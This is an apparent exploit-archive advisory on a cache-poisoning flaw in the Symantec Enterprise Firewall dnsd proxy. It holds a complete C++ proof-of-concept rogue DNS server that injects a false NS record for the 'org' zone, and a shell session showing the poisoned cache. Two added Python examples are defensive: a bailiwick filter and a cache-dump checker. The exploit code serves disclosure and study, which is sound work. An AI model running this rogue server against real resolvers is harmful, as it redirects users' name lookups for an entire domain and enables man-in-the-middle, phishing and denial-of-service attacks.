
dnsPoison.cpp.txt

Posted Jun 18, 2004
Authored by fryxar

Symantec Enterprise Firewall dnsd proxy, versions 8 and later, is vulnerable to cache poisoning attacks when acting as a caching nameserver. Full proof of concept exploit included.

tags | exploit, proof of concept
SHA-256 | cb84018e4595e260c546cc412ec384eecb358019a95b682a3b76aa4857dc9956

Symantec Enterprise Firewall dnsd proxy, versions 8 and later, is
vulnerable to cache poisoning attacks when acting as a caching
nameserver. It is possible to inject false entries into its cache and make
a rogue DNS server appear to be authoritative for a zone it does not own.
Once that entry is cached, every query for a name under that zone is sent
to the rogue server.

To do that, a malicious DNS server responding to a query, not necessarily
with an answer, fills the authority and additional sections of the DNS
response with records that need not relate to the answer at all. The SEF
dnsd proxy accepts this response without performing any check that the
information is correct or even related to the answer, i.e. that the
responding server has authority over those records (the "bailiwick" check
a caching resolver is expected to apply before trusting authority or
additional data).

We have found some public DNS servers that use this vulnerability to
redirect unregistered domains to their sites. It could also be used for
Man-in-the-Middle, Denial of Service or Social Engineering attacks.
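The check that dnsd skips, shown as an added example (this is not code from
the advisory or from the poslib PoC below): the script builds the same
poisoned response the PoC sends (an honest A answer for fryxar.afraid.org,
an NS record for "org" pointing at fakedns.com in the authority section and
glue for fakedns.com in the additional section), parses it back from wire
format, and then drops every record whose owner name is outside the
bailiwick of the server that was queried. The bailiwick "fryxar.afraid.org"
is assumed to be the zone the resolver was delegated to when it asked that
server; the names and addresses are the ones used in the advisory, and the
message bytes are constructed here, not captured.

```python
# Added example, not part of fryxar's advisory or the poslib PoC: build the
# poisoned response the PoC sends, parse it back from wire format, and apply
# the bailiwick rule a caching resolver must enforce before trusting records
# from the authority and additional sections. Names and addresses are the
# ones from the advisory; the bailiwick ("fryxar.afraid.org") is assumed to
# be the zone the resolver was delegated to when it asked this server.
import struct

TYPE_A, TYPE_NS, CLASS_IN = 1, 2, 1

def encode_name(name):
    """Wire-encode a domain name as length-prefixed labels (no compression)."""
    out = b""
    for label in name.rstrip(".").split("."):
        if label:
            out += bytes([len(label)]) + label.encode("ascii")
    return out + b"\x00"

def decode_name(msg, off):
    """Decode a name at msg[off:], following compression pointers.
    Returns (name with trailing dot, offset just past the name)."""
    labels = []
    while True:
        ln = msg[off]
        if ln == 0:
            return ".".join(labels) + ".", off + 1
        if ln & 0xC0 == 0xC0:  # compression pointer to an earlier name
            ptr = struct.unpack("!H", msg[off:off + 2])[0] & 0x3FFF
            tail, _ = decode_name(msg, ptr)
            return (".".join(labels + [tail]) if labels else tail), off + 2
        labels.append(msg[off + 1:off + 1 + ln].decode("ascii"))
        off += 1 + ln

def rr(name, rtype, rdata, ttl=3600):
    """One resource record: owner, type, class IN, TTL, RDLENGTH, RDATA."""
    return encode_name(name) + struct.pack("!HHIH", rtype, CLASS_IN, ttl, len(rdata)) + rdata

def a_rdata(ip):
    return bytes(int(o) for o in ip.split("."))

def build_poisoned_response(txid):
    """Constructed copy of the PoC's reply: one honest answer plus an
    out-of-bailiwick NS for "org" and glue for the rogue server."""
    header = struct.pack("!HHHHHH", txid, 0x8100, 1, 1, 1, 1)  # QR=1, RD=1
    question = encode_name("fryxar.afraid.org") + struct.pack("!HH", TYPE_A, CLASS_IN)
    answer = rr("fryxar.afraid.org", TYPE_A, a_rdata("200.200.200.200"))
    authority = rr("org", TYPE_NS, encode_name("fakedns.com"))
    additional = rr("fakedns.com", TYPE_A, a_rdata("200.200.200.201"))
    return header + question + answer + authority + additional

def parse_response(msg):
    """Return (questions, {section: [(owner, type, ttl, rdata_text)]})."""
    txid, flags, qd, an, ns, ar = struct.unpack("!HHHHHH", msg[:12])
    if not flags & 0x8000:
        raise ValueError("not a response (QR bit clear)")
    off, questions = 12, []
    for _ in range(qd):
        name, off = decode_name(msg, off)
        qtype, _qclass = struct.unpack("!HH", msg[off:off + 4])
        questions.append((name, qtype))
        off += 4
    sections = {}
    for key, count in (("answer", an), ("authority", ns), ("additional", ar)):
        recs = []
        for _ in range(count):
            name, off = decode_name(msg, off)
            rtype, _rclass, ttl, rdlen = struct.unpack("!HHIH", msg[off:off + 10])
            off += 10
            rdata_off, rdata = off, msg[off:off + rdlen]
            off += rdlen
            if rtype == TYPE_A and rdlen == 4:
                text = ".".join(str(b) for b in rdata)
            elif rtype == TYPE_NS:
                text, _ = decode_name(msg, rdata_off)
            else:
                text = rdata.hex()
            recs.append((name, rtype, ttl, text))
        sections[key] = recs
    return questions, sections

def in_bailiwick(owner, zone):
    """True if owner is the zone apex or below it, on a label boundary
    (a plain suffix test would let "fakeorg." pass for zone "org.")."""
    owner, zone = owner.lower().rstrip("."), zone.lower().rstrip(".")
    return zone == "" or owner == zone or owner.endswith("." + zone)

def sanitize(sections, bailiwick):
    """Drop every record whose owner is outside the bailiwick of the server
    that produced the response, whatever section it came in. This is the
    check dnsd skips; RFC 2181 section 5.4.1 ranks such data as untrusted."""
    kept, dropped = {}, []
    for key, recs in sections.items():
        kept[key] = [r for r in recs if in_bailiwick(r[0], bailiwick)]
        dropped += [(key,) + r for r in recs if not in_bailiwick(r[0], bailiwick)]
    return kept, dropped

if __name__ == "__main__":
    _, secs = parse_response(build_poisoned_response(0x1234))
    kept, dropped = sanitize(secs, "fryxar.afraid.org")
    for d in dropped:
        print("dropped out-of-bailiwick %s record: %s -> %s" % (d[0], d[1], d[4]))
    print("cached:", kept)
```

Run as-is and the A record for fryxar.afraid.org survives while the "org"
NS and the fakedns.com glue are discarded, which is exactly the data dnsd
wrote into its cache in the session below. The bailiwick test is done on a
label boundary on purpose; a plain string suffix match is a common mistake
that would let "fakeorg." pass as being under "org.".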


Solution:
At the time of this writing, no solution was available.


Proof (Solaris 9 / SEF 8 and SEF 7.0.4):

On an authoritative nameserver (e.g. I used the afraid.org dynamic DNS
service, which supports NS delegation of subdomains), compile and run the
following small DNS server:

#########################################################
# Begin poc.cpp
#########################################################

// PoC poisoning cache attack SEF 8 and later (by fryxar)
// Requires poslib 1.0.4 library
// Compile: g++ `poslib-config --libs --cflags --server` poc.cpp -o poc

#define POS_DEFAULTLOG
#define POS_DEFAULTLOG_STDERR
#define POS_DEFAULTLOG_SYSLOG

// Server include file
#include <poslib/server/server.h>

// For printf() and signal handling
#include <stdio.h>
#include <stdlib.h>
#include <signal.h>

// Zone this server is delegated for, taken from the command line
char *dyndomain;

DnsMessage *my_handle_query(pending_query *query);

void cleanup(int sig) {
  // close down the server system
  pos_setquitflag();
}

int main(int argc, char **argv) {
  _addr a;

  try {
    /* get command-line arguments */
    if (argc != 2) {
      printf("Usage: %s [domainname]\n", argv[0]);
      return 1;
    } else {
      dyndomain = argv[1];
      txt_to_addr(&a, "any");   // bind to all local addresses
    }

    poslib_config_init();

    /* bring up posadis */
    servers.push_front(ServerSocket(ss_udp, udpcreateserver(&a)));

    // use the posadis logging system
    pos_log(context_none, log_info,
            "Proof of concept DNS server starting up...");

    // set signal handlers
    signal(SIGINT, cleanup);
    signal(SIGTERM, cleanup);

    // set query function
    handle_query = my_handle_query;

    // run server
    posserver_run();
  } catch (PException p) {
    printf("Fatal exception: %s\n", p.message);
    return 1;
  }

  return 0;
}

/* the entry function which will handle all queries */
DnsMessage *my_handle_query(pending_query *query) {
  DnsMessage *a = new DnsMessage();
  DnsQuestion q;
  DnsRR rr;

  /* set a as an answer to the query */
  a->ID = query->message->ID;
  a->RD = query->message->RD;
  a->RA = false;

  if (query->message->questions.begin() == query->message->questions.end()) {
    /* query did not contain question */
    a->RCODE = RCODE_QUERYERR;
    return a;
  }
  q = *query->message->questions.begin();
  a->questions.push_back(q);
  a->QR = true;

  pos_log(context_server, log_info, "Query: [%s,%s]", q.QNAME.tocstr(),
          str_qtype(q.QTYPE).c_str());

  if (q.QTYPE == DNS_TYPE_A && q.QNAME == dyndomain) {
    /* Answer section: a plausible A record for our own name */
    rr = DnsRR(dyndomain, DNS_TYPE_A, CLASS_IN, 3600);
    string data = rr_fromstring(DNS_TYPE_A, "200.200.200.200"); // Anything...
    rr.RDLENGTH = data.size();
    rr.RDATA = (char *)memdup(data.c_str(), data.size());
    a->answers.push_back(rr);

    /* Authority section: the poison. Claims fakedns.com is an NS for "org",
       a zone this server has no authority over. */
    rr = DnsRR("org", DNS_TYPE_NS, CLASS_IN, 3600);
    data = rr_fromstring(DNS_TYPE_NS, "fakedns.com");
    rr.RDLENGTH = data.size();
    rr.RDATA = (char *)memdup(data.c_str(), data.size());
    a->authority.push_back(rr);

    /* Additional section: glue so the victim learns where fakedns.com is */
    rr = DnsRR("fakedns.com", DNS_TYPE_A, CLASS_IN, 3600);
    data = rr_fromstring(DNS_TYPE_A, "200.200.200.201"); // Anything...
    rr.RDLENGTH = data.size();
    rr.RDATA = (char *)memdup(data.c_str(), data.size());
    a->additional.push_back(rr);
  } else {
    /* we don't want this */
    a->RCODE = RCODE_SRVFAIL;
  }
  return a;
}
#########################################################
# End poc.cpp
#########################################################


fryxar.afraid.org # ./poc fryxar.afraid.org

and now, on the SEF firewall:

firewall # kill `ps -ef | awk '/[d]nsd/ { print $2 }'` # Cleaning the cache

firewall # nslookup afraid.org 127.0.0.1 # Caching org. NS
Server: localhost
Address: 127.0.0.1

Non-authoritative answer:
Name: afraid.org
Addresses: 69.42.89.56, 69.42.89.53, 69.42.89.55, 69.42.89.54

firewall # kill -USR1 `ps -ef | awk '/[d]nsd/ { print $2 }'` # dnsd dump

firewall # sed -n '/^org.$/,/^[^ ]/p' /usr/adm/sg/dnsd.dat # show cached "org." NS
org.
172775 NS TLD2.ULTRADNS.NET.
172775 NS TLD1.ULTRADNS.NET.
2.110.45.209.in-addr.jjc.com.pe.

firewall # nslookup fryxar.afraid.org 127.0.0.1 # Domain owned by my poisoned DNS
Server: localhost
Address: 127.0.0.1

Non-authoritative answer:
Name: fryxar.afraid.org
Address: 200.200.200.200

firewall # kill -USR1 `ps -ef | awk '/[d]nsd/ { print $2 }'` # dnsd dump

firewall # sed -n '/^org.$/,/^[^ ]/p' /usr/adm/sg/dnsd.dat # show cached "org." NS
org.
3567 NS fakedns.com. <- Ooohh!
3567 NS TLD2.ULTRADNS.NET.
3567 NS TLD1.ULTRADNS.NET.
2.110.45.209.in-addr.jjc.com.pe.

And now SEF "thinks" that the fakedns.com server is an authoritative
nameserver for the "org." domain, learned from the fryxar.afraid.org DNS
server, which is only authoritative for the fryxar.afraid.org domain.
--
fryxar <fryxar@datafull.com>
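The same cache inspection done by the session above, turned into a check
that can be run over a dnsd dump after `kill -USR1`, as an added example
that is not part of the advisory. The dump layout is an assumption taken
from the excerpt: an owner name alone on a line followed by indented
"TTL TYPE RDATA" lines, which is what the sed range prints; nothing else
about the dnsd.dat format is known here, and the sample dump is constructed
to match that layout. The expected "org." nameserver set is the one the
first dump shows before the poisoned lookup.

```python
# Added example, not part of the advisory: check a dnsd cache dump for NS
# records the parent zone never delegated. The dump layout is an assumption
# taken from the advisory's sed excerpt (an owner name alone on a line, then
# indented "TTL TYPE RDATA" lines); nothing else about dnsd.dat is known
# here. The expected "org." NS set is the one the first dump shows.

# Constructed sample in that layout, as the cache looks after the PoC ran.
SAMPLE_DUMP = """\
afraid.org.
  3500 A 69.42.89.56
org.
  3567 NS fakedns.com.
  3567 NS TLD2.ULTRADNS.NET.
  3567 NS TLD1.ULTRADNS.NET.
next.zone.example.
  300 A 192.0.2.10
"""

# Delegation the parent (the root zone, for "org.") actually publishes. In
# production fetch it with `dig +norecurse org. NS @<root server>` rather
# than hard-coding it; the values here are the advisory's pre-poisoning dump.
EXPECTED_NS = {"org.": {"tld1.ultradns.net.", "tld2.ultradns.net."}}


def parse_dump(text):
    """Return {owner: [(ttl, type, rdata), ...]} from a dnsd.dat-style dump."""
    zones, current = {}, None
    for line in text.splitlines():
        if not line.strip():
            continue
        if line[0] not in " \t":          # unindented line: a new owner name
            current = line.strip().lower()
            zones.setdefault(current, [])
            continue
        if current is None:
            raise ValueError("record before any owner name: %r" % line)
        ttl, rtype, rdata = line.split(None, 2)
        zones[current].append((int(ttl), rtype.upper(), rdata.strip().lower()))
    return zones


def cached_ns(zones, zone):
    """Name servers the cache currently believes serve `zone`."""
    return {rdata for _, rtype, rdata in zones.get(zone.lower(), []) if rtype == "NS"}


def find_rogue_ns(zones, expected):
    """Map each zone to the cached NS names missing from its real delegation."""
    rogue = {}
    for zone, good in expected.items():
        extra = cached_ns(zones, zone) - {n.lower() for n in good}
        if extra:
            rogue[zone] = sorted(extra)
    return rogue


if __name__ == "__main__":
    for zone, names in find_rogue_ns(parse_dump(SAMPLE_DUMP), EXPECTED_NS).items():
        print("%s has NS records not in the parent delegation: %s"
              % (zone, ", ".join(names)))
```

Against the session above, `parse_dump(open("/usr/adm/sg/dnsd.dat").read())`
taken right after the `kill -USR1` would report fakedns.com. under "org.",
the same line the author marks "Ooohh!". Comparing against the parent's
delegation rather than against a fixed list is what makes the check hold up
when the real TLD servers change.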